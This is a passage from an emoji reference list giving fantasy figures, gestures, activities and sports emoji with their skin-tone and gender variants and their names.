🧚🏾♀️ Woman Fairy: Medium-Dark Skin Tone
🧚🏿♀️ Woman Fairy: Dark Skin Tone
🧚♂️ Man Fairy
🧚🏻♂️ Man Fairy: Light Skin Tone
🧚🏼♂️ Man Fairy: Medium-Light Skin Tone
🧚🏽♂️ Man Fairy: Medium Skin Tone
🧚🏾♂️ Man Fairy: Medium-Dark Skin Tone
🧚🏿♂️ Man Fairy: Dark Skin Tone
🧛 Vampire
🧛🏻 Vampire: Light Skin Tone
🧛🏼 Vampire: Medium-Light Skin Tone
🧛🏽 Vampire: Medium Skin Tone
🧛🏾 Vampire: Medium-Dark Skin Tone
🧛🏿 Vampire: Dark Skin Tone
🧛♀️ Woman Vampire
🧛🏻♀️ Woman Vampire: Light Skin Tone
🧛🏼♀️ Woman Vampire: Medium-Light Skin Tone
🧛🏽♀️ Woman Vampire: Medium Skin Tone
🧛🏾♀️ Woman Vampire: Medium-Dark Skin Tone
🧛🏿♀️ Woman Vampire: Dark Skin Tone
🧛♂️ Man Vampire
🧛🏻♂️ Man Vampire: Light Skin Tone
🧛🏼♂️ Man Vampire: Medium-Light Skin Tone
🧛🏽♂️ Man Vampire: Medium Skin Tone
🧛🏾♂️ Man Vampire: Medium-Dark Skin Tone
🧛🏿♂️ Man Vampire: Dark Skin Tone
👯🏻 Woman With Bunny Ears, Type-1-2
👯🏼 Woman With Bunny Ears, Type-3
👯🏽 Woman With Bunny Ears, Type-4
👯🏾 Woman With Bunny Ears, Type-5
👯🏿 Woman With Bunny Ears, Type-6
👯🏻♂️ Men With Bunny Ears Partying, Type-1-2
👯🏼♂️ Men With Bunny Ears Partying, Type-3
👯🏽♂️ Men With Bunny Ears Partying, Type-4
👯🏾♂️ Men With Bunny Ears Partying, Type-5
👯🏿♂️ Men With Bunny Ears Partying, Type-6
👯🏻♀️ Women With Bunny Ears Partying, Type-1-2
👯🏼♀️ Women With Bunny Ears Partying, Type-3
👯🏽♀️ Women With Bunny Ears Partying, Type-4
👯🏾♀️ Women With Bunny Ears Partying, Type-5
👯🏿♀️ Women With Bunny Ears Partying, Type-6
🧜 Merperson
🧜🏻 Merperson: Light Skin Tone
🧜🏼 Merperson: Medium-Light Skin Tone
🧜🏽 Merperson: Medium Skin Tone
🧜🏾 Merperson: Medium-Dark Skin Tone
🧜🏿 Merperson: Dark Skin Tone
🧜♀️ Mermaid
🧜🏻♀️ Mermaid: Light Skin Tone
🧜🏼♀️ Mermaid: Medium-Light Skin Tone
🧜🏽♀️ Mermaid: Medium Skin Tone
🧜🏾♀️ Mermaid: Medium-Dark Skin Tone
🧜🏿♀️ Mermaid: Dark Skin Tone
🧜♂️ Merman
🧜🏻♂️ Merman: Light Skin Tone
🧜🏼♂️ Merman: Medium-Light Skin Tone
🧜🏽♂️ Merman: Medium Skin Tone
🧜🏾♂️ Merman: Medium-Dark Skin Tone
🧜🏿♂️ Merman: Dark Skin Tone
👫🏻 Man and Woman Holding Hands, Type-1-2
👫🏼 Man and Woman Holding Hands, Type-3
👫🏽 Man and Woman Holding Hands, Type-4
👫🏾 Man and Woman Holding Hands, Type-5
👫🏿 Man and Woman Holding Hands, Type-6
👬🏻 Two Men Holding Hands, Type-1-2
👬🏼 Two Men Holding Hands, Type-3
👬🏽 Two Men Holding Hands, Type-4
👬🏾 Two Men Holding Hands, Type-5
👬🏿 Two Men Holding Hands, Type-6
👭🏻 Two Women Holding Hands, Type-1-2
👭🏼 Two Women Holding Hands, Type-3
👭🏽 Two Women Holding Hands, Type-4
👭🏾 Two Women Holding Hands, Type-5
👭🏿 Two Women Holding Hands, Type-6
🧝 Elf
🧝🏻 Elf: Light Skin Tone
🧝🏼 Elf: Medium-Light Skin Tone
🧝🏽 Elf: Medium Skin Tone
🧝🏾 Elf: Medium-Dark Skin Tone
🧝🏿 Elf: Dark Skin Tone
🧝♀️ Woman Elf
🧝🏻♀️ Woman Elf: Light Skin Tone
🧝🏼♀️ Woman Elf: Medium-Light Skin Tone
🧝🏽♀️ Woman Elf: Medium Skin Tone
🧝🏾♀️ Woman Elf: Medium-Dark Skin Tone
🧝🏿♀️ Woman Elf: Dark Skin Tone
🧝♂️ Man Elf
🧝🏻♂️ Man Elf: Light Skin Tone
🧝🏼♂️ Man Elf: Medium-Light Skin Tone
🧝🏽♂️ Man Elf: Medium Skin Tone
🧝🏾♂️ Man Elf: Medium-Dark Skin Tone
🧝🏿♂️ Man Elf: Dark Skin Tone
👪🏻 Family, Type-1-2
👪🏼 Family, Type-3
👪🏽 Family, Type-4
👪🏾 Family, Type-5
👪🏿 Family, Type-6
🧞 Genie
🧞♀️ Woman Genie
🧞♂️ Man Genie
🧟 Zombie
🧟♀️ Woman Zombie
🧟♂️ Man Zombie
🙍 Person Frowning
🙍🏻 Person Frowning: Light Skin Tone
🙍🏼 Person Frowning: Medium-Light Skin Tone
🙍🏽 Person Frowning: Medium Skin Tone
🙍🏾 Person Frowning: Medium-Dark Skin Tone
🙍🏿 Person Frowning: Dark Skin Tone
🙍♂️ Man Frowning
🙍🏻♂️ Man Frowning: Light Skin Tone
🙍🏼♂️ Man Frowning: Medium-Light Skin Tone
🙍🏽♂️ Man Frowning: Medium Skin Tone
🙍🏾♂️ Man Frowning: Medium-Dark Skin Tone
🙍🏿♂️ Man Frowning: Dark Skin Tone
🙍♀️ Woman Frowning
🙍🏻♀️ Woman Frowning: Light Skin Tone
🙍🏼♀️ Woman Frowning: Medium-Light Skin Tone
🙍🏽♀️ Woman Frowning: Medium Skin Tone
🙍🏾♀️ Woman Frowning: Medium-Dark Skin Tone
🙍🏿♀️ Woman Frowning: Dark Skin Tone
🏻 Light Skin Tone
🏼 Medium-Light Skin Tone
🏽 Medium Skin Tone
🏾 Medium-Dark Skin Tone
🏿 Dark Skin Tone
🙎 Person Pouting
🙎🏻 Person Pouting: Light Skin Tone
🙎🏼 Person Pouting: Medium-Light Skin Tone
🙎🏽 Person Pouting: Medium Skin Tone
🙎🏾 Person Pouting: Medium-Dark Skin Tone
🙎🏿 Person Pouting: Dark Skin Tone
🙎♂️ Man Pouting
🙎🏻♂️ Man Pouting: Light Skin Tone
🙎🏼♂️ Man Pouting: Medium-Light Skin Tone
🙎🏽♂️ Man Pouting: Medium Skin Tone
🙎🏾♂️ Man Pouting: Medium-Dark Skin Tone
🙎🏿♂️ Man Pouting: Dark Skin Tone
🙎♀️ Woman Pouting
🙎🏻♀️ Woman Pouting: Light Skin Tone
🙎🏼♀️ Woman Pouting: Medium-Light Skin Tone
🙎🏽♀️ Woman Pouting: Medium Skin Tone
🙎🏾♀️ Woman Pouting: Medium-Dark Skin Tone
🙎🏿♀️ Woman Pouting: Dark Skin Tone
🙅 Person Gesturing No
🙅🏻 Person Gesturing No: Light Skin Tone
🙅🏼 Person Gesturing No: Medium-Light Skin Tone
🙅🏽 Person Gesturing No: Medium Skin Tone
🙅🏾 Person Gesturing No: Medium-Dark Skin Tone
🙅🏿 Person Gesturing No: Dark Skin Tone
🙅♂️ Man Gesturing No
🙅🏻♂️ Man Gesturing No: Light Skin Tone
🙅🏼♂️ Man Gesturing No: Medium-Light Skin Tone
🙅🏽♂️ Man Gesturing No: Medium Skin Tone
🙅🏾♂️ Man Gesturing No: Medium-Dark Skin Tone
🙅🏿♂️ Man Gesturing No: Dark Skin Tone
🙅♀️ Woman Gesturing No
🙅🏻♀️ Woman Gesturing No: Light Skin Tone
🙅🏼♀️ Woman Gesturing No: Medium-Light Skin Tone
🙅🏽♀️ Woman Gesturing No: Medium Skin Tone
🙅🏾♀️ Woman Gesturing No: Medium-Dark Skin Tone
🙅🏿♀️ Woman Gesturing No: Dark Skin Tone
🙆 Person Gesturing OK
🙆🏻 Person Gesturing OK: Light Skin Tone
🙆🏼 Person Gesturing OK: Medium-Light Skin Tone
🙆🏽 Person Gesturing OK: Medium Skin Tone
🙆🏾 Person Gesturing OK: Medium-Dark Skin Tone
🙆🏿 Person Gesturing OK: Dark Skin Tone
🙆♂️ Man Gesturing OK
🙆🏻♂️ Man Gesturing OK: Light Skin Tone
🙆🏼♂️ Man Gesturing OK: Medium-Light Skin Tone
🙆🏽♂️ Man Gesturing OK: Medium Skin Tone
🙆🏾♂️ Man Gesturing OK: Medium-Dark Skin Tone
🙆🏿♂️ Man Gesturing OK: Dark Skin Tone
🙆♀️ Woman Gesturing OK
🙆🏻♀️ Woman Gesturing OK: Light Skin Tone
🙆🏼♀️ Woman Gesturing OK: Medium-Light Skin Tone
🙆🏽♀️ Woman Gesturing OK: Medium Skin Tone
🙆🏾♀️ Woman Gesturing OK: Medium-Dark Skin Tone
🙆🏿♀️ Woman Gesturing OK: Dark Skin Tone
💁 Person Tipping Hand
💁🏻 Person Tipping Hand: Light Skin Tone
💁🏼 Person Tipping Hand: Medium-Light Skin Tone
💁🏽 Person Tipping Hand: Medium Skin Tone
💁🏾 Person Tipping Hand: Medium-Dark Skin Tone
💁🏿 Person Tipping Hand: Dark Skin Tone
💁♂️ Man Tipping Hand
💁🏻♂️ Man Tipping Hand: Light Skin Tone
💁🏼♂️ Man Tipping Hand: Medium-Light Skin Tone
💁🏽♂️ Man Tipping Hand: Medium Skin Tone
💁🏾♂️ Man Tipping Hand: Medium-Dark Skin Tone
💁🏿♂️ Man Tipping Hand: Dark Skin Tone
💁♀️ Woman Tipping Hand
💁🏻♀️ Woman Tipping Hand: Light Skin Tone
💁🏼♀️ Woman Tipping Hand: Medium-Light Skin Tone
💁🏽♀️ Woman Tipping Hand: Medium Skin Tone
💁🏾♀️ Woman Tipping Hand: Medium-Dark Skin Tone
💁🏿♀️ Woman Tipping Hand: Dark Skin Tone
🙋 Person Raising Hand
🙋🏻 Person Raising Hand: Light Skin Tone
🙋🏼 Person Raising Hand: Medium-Light Skin Tone
🙋🏽 Person Raising Hand: Medium Skin Tone
🙋🏾 Person Raising Hand: Medium-Dark Skin Tone
🙋🏿 Person Raising Hand: Dark Skin Tone
🙋♂️ Man Raising Hand
🙋🏻♂️ Man Raising Hand: Light Skin Tone
🙋🏼♂️ Man Raising Hand: Medium-Light Skin Tone
🙋🏽♂️ Man Raising Hand: Medium Skin Tone
🙋🏾♂️ Man Raising Hand: Medium-Dark Skin Tone
🙋🏿♂️ Man Raising Hand: Dark Skin Tone
🙋♀️ Woman Raising Hand
🙋🏻♀️ Woman Raising Hand: Light Skin Tone
🙋🏼♀️ Woman Raising Hand: Medium-Light Skin Tone
🙋🏽♀️ Woman Raising Hand: Medium Skin Tone
🙋🏾♀️ Woman Raising Hand: Medium-Dark Skin Tone
🙋🏿♀️ Woman Raising Hand: Dark Skin Tone
🙇 Person Bowing
🙇🏻 Person Bowing: Light Skin Tone
🙇🏼 Person Bowing: Medium-Light Skin Tone
🙇🏽 Person Bowing: Medium Skin Tone
🙇🏾 Person Bowing: Medium-Dark Skin Tone
🙇🏿 Person Bowing: Dark Skin Tone
🙇♂️ Man Bowing
🙇🏻♂️ Man Bowing: Light Skin Tone
🙇🏼♂️ Man Bowing: Medium-Light Skin Tone
🙇🏽♂️ Man Bowing: Medium Skin Tone
🙇🏾♂️ Man Bowing: Medium-Dark Skin Tone
🙇🏿♂️ Man Bowing: Dark Skin Tone
🙇♀️ Woman Bowing
🙇🏻♀️ Woman Bowing: Light Skin Tone
🙇🏼♀️ Woman Bowing: Medium-Light Skin Tone
🙇🏽♀️ Woman Bowing: Medium Skin Tone
🙇🏾♀️ Woman Bowing: Medium-Dark Skin Tone
🙇🏿♀️ Woman Bowing: Dark Skin Tone
🤝🏻 Handshake, Type-1-2
🤝🏼 Handshake, Type-3
🤝🏽 Handshake, Type-4
🤝🏾 Handshake, Type-5
🤝🏿 Handshake, Type-6
🤦 Person Facepalming
🤦🏻 Person Facepalming: Light Skin Tone
🤦🏼 Person Facepalming: Medium-Light Skin Tone
🤦🏽 Person Facepalming: Medium Skin Tone
🤦🏾 Person Facepalming: Medium-Dark Skin Tone
🤦🏿 Person Facepalming: Dark Skin Tone
🤦♂️ Man Facepalming
🤦🏻♂️ Man Facepalming: Light Skin Tone
🤦🏼♂️ Man Facepalming: Medium-Light Skin Tone
🤦🏽♂️ Man Facepalming: Medium Skin Tone
🤦🏾♂️ Man Facepalming: Medium-Dark Skin Tone
🤦🏿♂️ Man Facepalming: Dark Skin Tone
🤦♀️ Woman Facepalming
🤦🏻♀️ Woman Facepalming: Light Skin Tone
🤦🏼♀️ Woman Facepalming: Medium-Light Skin Tone
🤦🏽♀️ Woman Facepalming: Medium Skin Tone
🤦🏾♀️ Woman Facepalming: Medium-Dark Skin Tone
🤦🏿♀️ Woman Facepalming: Dark Skin Tone
🤷 Person Shrugging
🤷🏻 Person Shrugging: Light Skin Tone
🤷🏼 Person Shrugging: Medium-Light Skin Tone
🤷🏽 Person Shrugging: Medium Skin Tone
🤷🏾 Person Shrugging: Medium-Dark Skin Tone
🤷🏿 Person Shrugging: Dark Skin Tone
🤷♂️ Man Shrugging
🤷🏻♂️ Man Shrugging: Light Skin Tone
🤷🏼♂️ Man Shrugging: Medium-Light Skin Tone
🤷🏽♂️ Man Shrugging: Medium Skin Tone
🤷🏾♂️ Man Shrugging: Medium-Dark Skin Tone
🤷🏿♂️ Man Shrugging: Dark Skin Tone
🤷♀️ Woman Shrugging
🤷🏻♀️ Woman Shrugging: Light Skin Tone
🤷🏼♀️ Woman Shrugging: Medium-Light Skin Tone
🤷🏽♀️ Woman Shrugging: Medium Skin Tone
🤷🏾♀️ Woman Shrugging: Medium-Dark Skin Tone
🤷🏿♀️ Woman Shrugging: Dark Skin Tone
💆 Person Getting Massage
💆🏻 Person Getting Massage: Light Skin Tone
💆🏼 Person Getting Massage: Medium-Light Skin Tone
💆🏽 Person Getting Massage: Medium Skin Tone
💆🏾 Person Getting Massage: Medium-Dark Skin Tone
💆🏿 Person Getting Massage: Dark Skin Tone
💆♂️ Man Getting Massage
💆🏻♂️ Man Getting Massage: Light Skin Tone
💆🏼♂️ Man Getting Massage: Medium-Light Skin Tone
💆🏽♂️ Man Getting Massage: Medium Skin Tone
💆🏾♂️ Man Getting Massage: Medium-Dark Skin Tone
💆🏿♂️ Man Getting Massage: Dark Skin Tone
💆♀️ Woman Getting Massage
💆🏻♀️ Woman Getting Massage: Light Skin Tone
💆🏼♀️ Woman Getting Massage: Medium-Light Skin Tone
💆🏽♀️ Woman Getting Massage: Medium Skin Tone
💆🏾♀️ Woman Getting Massage: Medium-Dark Skin Tone
💆🏿♀️ Woman Getting Massage: Dark Skin Tone
💇 Person Getting Haircut
💇🏻 Person Getting Haircut: Light Skin Tone
💇🏼 Person Getting Haircut: Medium-Light Skin Tone
💇🏽 Person Getting Haircut: Medium Skin Tone
💇🏾 Person Getting Haircut: Medium-Dark Skin Tone
💇🏿 Person Getting Haircut: Dark Skin Tone
💇♂️ Man Getting Haircut
💇🏻♂️ Man Getting Haircut: Light Skin Tone
💇🏼♂️ Man Getting Haircut: Medium-Light Skin Tone
💇🏽♂️ Man Getting Haircut: Medium Skin Tone
💇🏾♂️ Man Getting Haircut: Medium-Dark Skin Tone
💇🏿♂️ Man Getting Haircut: Dark Skin Tone
💇♀️ Woman Getting Haircut
💇🏻♀️ Woman Getting Haircut: Light Skin Tone
💇🏼♀️ Woman Getting Haircut: Medium-Light Skin Tone
💇🏽♀️ Woman Getting Haircut: Medium Skin Tone
💇🏾♀️ Woman Getting Haircut: Medium-Dark Skin Tone
💇🏿♀️ Woman Getting Haircut: Dark Skin Tone
🚶 Person Walking
🚶🏻 Person Walking: Light Skin Tone
🚶🏼 Person Walking: Medium-Light Skin Tone
🚶🏽 Person Walking: Medium Skin Tone
🚶🏾 Person Walking: Medium-Dark Skin Tone
🚶🏿 Person Walking: Dark Skin Tone
🚶♂️ Man Walking
🚶🏻♂️ Man Walking: Light Skin Tone
🚶🏼♂️ Man Walking: Medium-Light Skin Tone
🚶🏽♂️ Man Walking: Medium Skin Tone
🚶🏾♂️ Man Walking: Medium-Dark Skin Tone
🚶🏿♂️ Man Walking: Dark Skin Tone
🚶♀️ Woman Walking
🚶🏻♀️ Woman Walking: Light Skin Tone
🚶🏼♀️ Woman Walking: Medium-Light Skin Tone
🚶🏽♀️ Woman Walking: Medium Skin Tone
🚶🏾♀️ Woman Walking: Medium-Dark Skin Tone
🚶🏿♀️ Woman Walking: Dark Skin Tone
🏃 Person Running
🏃🏻 Person Running: Light Skin Tone
🏃🏼 Person Running: Medium-Light Skin Tone
🏃🏽 Person Running: Medium Skin Tone
🏃🏾 Person Running: Medium-Dark Skin Tone
🏃🏿 Person Running: Dark Skin Tone
🏃♂️ Man Running
🏃🏻♂️ Man Running: Light Skin Tone
🏃🏼♂️ Man Running: Medium-Light Skin Tone
🏃🏽♂️ Man Running: Medium Skin Tone
🏃🏾♂️ Man Running: Medium-Dark Skin Tone
🏃🏿♂️ Man Running: Dark Skin Tone
🏃♀️ Woman Running
🏃🏻♀️ Woman Running: Light Skin Tone
🏃🏼♀️ Woman Running: Medium-Light Skin Tone
🏃🏽♀️ Woman Running: Medium Skin Tone
🏃🏾♀️ Woman Running: Medium-Dark Skin Tone
🏃🏿♀️ Woman Running: Dark Skin Tone
💃 Woman Dancing
💃🏻 Woman Dancing: Light Skin Tone
💃🏼 Woman Dancing: Medium-Light Skin Tone
💃🏽 Woman Dancing: Medium Skin Tone
💃🏾 Woman Dancing: Medium-Dark Skin Tone
💃🏿 Woman Dancing: Dark Skin Tone
🕺 Man Dancing
🕺🏻 Man Dancing: Light Skin Tone
🕺🏼 Man Dancing: Medium-Light Skin Tone
🕺🏽 Man Dancing: Medium Skin Tone
🕺🏾 Man Dancing: Medium-Dark Skin Tone
🕺🏿 Man Dancing: Dark Skin Tone
👯 People With Bunny Ears Partying
👯♂️ Men With Bunny Ears Partying
👯♀️ Women With Bunny Ears Partying
🧖 Person in Steamy Room
🧖🏻 Person in Steamy Room: Light Skin Tone
🧖🏼 Person in Steamy Room: Medium-Light Skin Tone
🧖🏽 Person in Steamy Room: Medium Skin Tone
🧖🏾 Person in Steamy Room: Medium-Dark Skin Tone
🧖🏿 Person in Steamy Room: Dark Skin Tone
🧖♀️ Woman in Steamy Room
🧖🏻♀️ Woman in Steamy Room: Light Skin Tone
🧖🏼♀️ Woman in Steamy Room: Medium-Light Skin Tone
🧖🏽♀️ Woman in Steamy Room: Medium Skin Tone
🧖🏾♀️ Woman in Steamy Room: Medium-Dark Skin Tone
🧖🏿♀️ Woman in Steamy Room: Dark Skin Tone
🧖♂️ Man in Steamy Room
🧖🏻♂️ Man in Steamy Room: Light Skin Tone
🧖🏼♂️ Man in Steamy Room: Medium-Light Skin Tone
🧖🏽♂️ Man in Steamy Room: Medium Skin Tone
🧖🏾♂️ Man in Steamy Room: Medium-Dark Skin Tone
🧖🏿♂️ Man in Steamy Room: Dark Skin Tone
🧗 Person Climbing
🧗🏻 Person Climbing: Light Skin Tone
🧗🏼 Person Climbing: Medium-Light Skin Tone
🧗🏽 Person Climbing: Medium Skin Tone
🧗🏾 Person Climbing: Medium-Dark Skin Tone
🧗🏿 Person Climbing: Dark Skin Tone
🧗♀️ Woman Climbing
🧗🏻♀️ Woman Climbing: Light Skin Tone
🧗🏼♀️ Woman Climbing: Medium-Light Skin Tone
🧗🏽♀️ Woman Climbing: Medium Skin Tone
🧗🏾♀️ Woman Climbing: Medium-Dark Skin Tone
🧗🏿♀️ Woman Climbing: Dark Skin Tone
🧗♂️ Man Climbing
🧗🏻♂️ Man Climbing: Light Skin Tone
🧗🏼♂️ Man Climbing: Medium-Light Skin Tone
🧗🏽♂️ Man Climbing: Medium Skin Tone
🧗🏾♂️ Man Climbing: Medium-Dark Skin Tone
🧗🏿♂️ Man Climbing: Dark Skin Tone
🧘 Person in Lotus Position
🧘🏻 Person in Lotus Position: Light Skin Tone
🧘🏼 Person in Lotus Position: Medium-Light Skin Tone
🧘🏽 Person in Lotus Position: Medium Skin Tone
🧘🏾 Person in Lotus Position: Medium-Dark Skin Tone
🧘🏿 Person in Lotus Position: Dark Skin Tone
🧘♀️ Woman in Lotus Position
🧘🏻♀️ Woman in Lotus Position: Light Skin Tone
🧘🏼♀️ Woman in Lotus Position: Medium-Light Skin Tone
🧘🏽♀️ Woman in Lotus Position: Medium Skin Tone
🧘🏾♀️ Woman in Lotus Position: Medium-Dark Skin Tone
🧘🏿♀️ Woman in Lotus Position: Dark Skin Tone
🧘♂️ Man in Lotus Position
🧘🏻♂️ Man in Lotus Position: Light Skin Tone
🧘🏼♂️ Man in Lotus Position: Medium-Light Skin Tone
🧘🏽♂️ Man in Lotus Position: Medium Skin Tone
🧘🏾♂️ Man in Lotus Position: Medium-Dark Skin Tone
🧘🏿♂️ Man in Lotus Position: Dark Skin Tone
🛀 Person Taking Bath
🛀🏻 Person Taking Bath: Light Skin Tone
🛀🏼 Person Taking Bath: Medium-Light Skin Tone
🛀🏽 Person Taking Bath: Medium Skin Tone
🛀🏾 Person Taking Bath: Medium-Dark Skin Tone
🛀🏿 Person Taking Bath: Dark Skin Tone
🛌 Person in Bed
🛌🏻 Person in Bed: Light Skin Tone
🛌🏼 Person in Bed: Medium-Light Skin Tone
🛌🏽 Person in Bed: Medium Skin Tone
🛌🏾 Person in Bed: Medium-Dark Skin Tone
🛌🏿 Person in Bed: Dark Skin Tone
🕴 Man in Business Suit Levitating
🕴🏻 Man in Business Suit Levitating: Light Skin Tone
🕴🏼 Man in Business Suit Levitating: Medium-Light Skin Tone
🕴🏽 Man in Business Suit Levitating: Medium Skin Tone
🕴🏾 Man in Business Suit Levitating: Medium-Dark Skin Tone
🕴🏿 Man in Business Suit Levitating: Dark Skin Tone
🗣 Speaking Head
👤 Bust in Silhouette
👥 Busts in Silhouette
🤺 Person Fencing
🏇 Horse Racing
🏇🏻 Horse Racing: Light Skin Tone
🏇🏼 Horse Racing: Medium-Light Skin Tone
🏇🏽 Horse Racing: Medium Skin Tone
🏇🏾 Horse Racing: Medium-Dark Skin Tone
🏇🏿 Horse Racing: Dark Skin Tone
⛷ Skier
🏂 Snowboarder
🏂🏻 Snowboarder: Light Skin Tone
🏂🏼 Snowboarder: Medium-Light Skin Tone
🏂🏽 Snowboarder: Medium Skin Tone
🏂🏾 Snowboarder: Medium-Dark Skin Tone
🏂🏿 Snowboarder: Dark Skin Tone
🏌 Person Golfing
🏌🏻 Person Golfing: Light Skin Tone
🏌🏼 Person Golfing: Medium-Light Skin Tone
🏌🏽 Person Golfing: Medium Skin Tone
🏌🏾 Person Golfing: Medium-Dark Skin Tone
🏌🏿 Person Golfing: Dark Skin Tone
🏌️♂️ Man Golfing
🏌🏻♂️ Man Golfing: Light Skin Tone
🏌🏼♂️ Man Golfing: Medium-Light Skin Tone
🏌🏽♂️ Man Golfing: Medium Skin Tone
🏌🏾♂️ Man Golfing: Medium-Dark Skin Tone
🏌🏿♂️ Man Golfing: Dark Skin Tone
🏌️♀️ Woman Golfing
🏌🏻♀️ Woman Golfing: Light Skin Tone
🏌🏼♀️ Woman Golfing: Medium-Light Skin Tone
🏌🏽♀️ Woman Golfing: Medium Skin Tone
🏌🏾♀️ Woman Golfing: Medium-Dark Skin Tone
🏌🏿♀️ Woman Golfing: Dark Skin Tone
🏄 Person Surfing
🏄🏻 Person Surfing: Light Skin Tone
🏄🏼 Person Surfing: Medium-Light Skin Tone
🏄🏽 Person Surfing: Medium Skin Tone
🏄🏾 Person Surfing: Medium-Dark Skin Tone
🏄🏿 Person Surfing: Dark Skin Tone
🏄♂️ Man Surfing
🏄🏻♂️ Man Surfing: Light Skin Tone
🏄🏼♂️ Man Surfing: Medium-Light Skin Tone
🏄🏽♂️ Man Surfing: Medium Skin Tone
🏄🏾♂️ Man Surfing: Medium-Dark Skin Tone
🏄🏿♂️ Man Surfing: Dark Skin Tone
🏄♀️ Woman Surfing
🏄🏻♀️ Woman Surfing: Light Skin Tone
🏄🏼♀️ Woman Surfing: Medium-Light Skin Tone
🏄🏽♀️ Woman Surfing: Medium Skin Tone
🏄🏾♀️ Woman Surfing: Medium-Dark Skin Tone
🏄🏿♀️ Woman Surfing: Dark Skin Tone
🚣 Person Rowing Boat
🚣🏻 Person Rowing Boat: Light Skin Tone
🚣🏼 Person Rowing Boat: Medium-Light Skin Tone
🚣🏽 Person Rowing Boat: Medium Skin Tone
🚣🏾 Person Rowing Boat: Medium-Dark Skin Tone
🚣🏿 Person Rowing Boat: Dark Skin Tone
🚣♂️ Man Rowing Boat
🚣🏻♂️ Man Rowing Boat: Light Skin Tone
🚣🏼♂️ Man Rowing Boat: Medium-Light Skin Tone
🚣🏽♂️ Man Rowing Boat: Medium Skin Tone
🚣🏾♂️ Man Rowing Boat: Medium-Dark Skin Tone
🚣🏿♂️ Man Rowing Boat: Dark Skin Tone
🚣♀️ Woman Rowing Boat
🚣🏻♀️ Woman Rowing Boat: Light Skin Tone
🚣🏼♀️ Woman Rowing Boat: Medium-Light Skin Tone
🚣🏽♀️ Woman Rowing Boat: Medium Skin Tone
🚣🏾♀️ Woman Rowing Boat: Medium-Dark Skin Tone
🚣🏿♀️ Woman Rowing Boat: Dark Skin Tone
🏊 Person Swimming
🏊🏻 Person Swimming: Light Skin Tone
🏊🏼 Person Swimming: Medium-Light Skin Tone
🏊🏽 Person Swimming: Medium Skin Tone
🏊🏾 Person Swimming: Medium-Dark Skin Tone
🏊🏿 Person Swimming: Dark Skin Tone
🏊♂️ Man Swimming
🏊🏻♂️ Man Swimming: Light Skin Tone
🏊🏼♂️ Man Swimming: Medium-Light Skin Tone
🏊🏽♂️ Man Swimming: Medium Skin Tone
🏊🏾♂️ Man Swimming: Medium-Dark Skin Tone
🏊🏿♂️ Man Swimming: Dark Skin Tone
🏊♀️ Woman Swimming
🏊🏻♀️ Woman Swimming: Light Skin Tone
🏊🏼♀️ Woman Swimming: Medium-Light Skin Tone
🏊🏽♀️ Woman Swimming: Medium Skin Tone
🏊🏾♀️ Woman Swimming: Medium-Dark Skin Tone
🏊🏿♀️ Woman Swimming: Dark Skin Tone
⛹ Person Bouncing Ball
⛹🏻 Person Bouncing Ball: Light Skin Tone
⛹🏼 Person Bouncing Ball: Medium-Light Skin Tone
⛹🏽 Person Bouncing Ball: Medium Skin Tone
⛹🏾 Person Bouncing Ball: Medium-Dark Skin Tone
⛹🏿 Person Bouncing Ball: Dark Skin Tone
⛹️♂️ Man Bouncing Ball
⛹🏻♂️ Man Bouncing Ball: Light Skin Tone
⛹🏼♂️ Man Bouncing Ball: Medium-Light Skin Tone
⛹🏽♂️ Man Bouncing Ball: Medium Skin Tone
⛹🏾♂️ Man Bouncing Ball: Medium-Dark Skin Tone
⛹🏿♂️ Man Bouncing Ball: Dark Skin Tone
⛹️♀️ Woman Bouncing Ball
⛹🏻♀️ Woman Bouncing Ball: Light Skin Tone
⛹🏼♀️ Woman Bouncing Ball: Medium-Light Skin Tone
⛹🏽♀️ Woman Bouncing Ball: Medium Skin Tone
⛹🏾♀️ Woman Bouncing Ball: Medium-Dark Skin Tone
⛹🏿♀️ Woman Bouncing Ball: Dark Skin Tone
🏋 Person Lifting Weights
🏋🏻 Person Lifting Weights: Light Skin Tone
🏋🏼 Person Lifting Weights: Medium-Light Skin Tone
🏋🏽 Person Lifting Weights: Medium Skin Tone
🏋🏾 Person Lifting Weights: Medium-Dark Skin Tone
🏋🏿 Person Lifting Weights: Dark Skin Tone
🏋️♂️ Man Lifting Weights
🏋🏻♂️ Man Lifting Weights: Light Skin Tone
🏋🏼♂️ Man Lifting Weights: Medium-Light Skin Tone
🏋🏽♂️ Man Lifting Weights: Medium Skin Tone
🏋🏾♂️ Man Lifting Weights: Medium-Dark Skin Tone
🏋🏿♂️ Man Lifting Weights: Dark Skin Tone
🏋️♀️ Woman Lifting Weights
🏋🏻♀️ Woman Lifting Weights: Light Skin Tone
🏋🏼♀️ Woman Lifting Weights: Medium-Light Skin Tone
🏋🏽♀️ Woman Lifting Weights: Medium Skin Tone
🏋🏾♀️ Woman Lifting Weights: Medium-Dark Skin Tone
🏋🏿♀️ Woman Lifting Weights: Dark Skin Tone
🚴 Person Biking
🚴🏻 Person Biking: Light Skin Tone
🚴🏼 Person Biking: Medium-Light Skin Tone
🚴🏽 Person Biking: Medium Skin Tone
🚴🏾 Person Biking: Medium-Dark Skin Tone
🚴🏿 Person Biking: Dark Skin Tone
🚴♂️ Man Biking
🚴🏻♂️ Man Biking: Light Skin Tone
🚴🏼♂️ Man Biking: Medium-Light Skin Tone
🚴🏽♂️ Man Biking: Medium Skin Tone
🚴🏾♂️ Man Biking: Medium-Dark Skin Tone
🚴🏿♂️ Man Biking: Dark Skin Tone
🚴♀️ Woman Biking
🚴🏻♀️ Woman Biking: Light Skin Tone
🚴🏼♀️ Woman Biking: Medium-Light Skin Tone
🚴🏽♀️ Woman Biking: Medium Skin Tone
🚴🏾♀️ Woman Biking: Medium-Dark Skin Tone
🚴🏿♀️ Woman Biking: Dark Skin Tone
🚵 Person Mountain Biking
🚵🏻 Person Mountain Biking: Light Skin Tone
🚵🏼 Person Mountain Biking: Medium-Light Skin Tone
🚵🏽 Person Mountain Biking: Medium Skin Tone
🚵🏾 Person Mountain Biking: Medium-Dark Skin Tone
🚵🏿 Person Mountain Biking: Dark Skin Tone
🚵♂️ Man Mountain Biking
🚵🏻♂️ Man Mountain Biking: Light Skin Tone
🚵🏼♂️ Man Mountain Biking: Medium-Light Skin Tone
🚵🏽♂️ Man Mountain Biking: Medium Skin Tone
🚵🏾♂️ Man Mountain Biking: Medium-Dark Skin Tone
🚵🏿♂️ Man Mountain Biking: Dark Skin Tone
🚵♀️ Woman Mountain Biking
🚵🏻♀️ Woman Mountain Biking: Light Skin Tone
🚵🏼♀️ Woman Mountain Biking: Medium-Light Skin Tone
🚵🏽♀️ Woman Mountain Biking: Medium Skin Tone
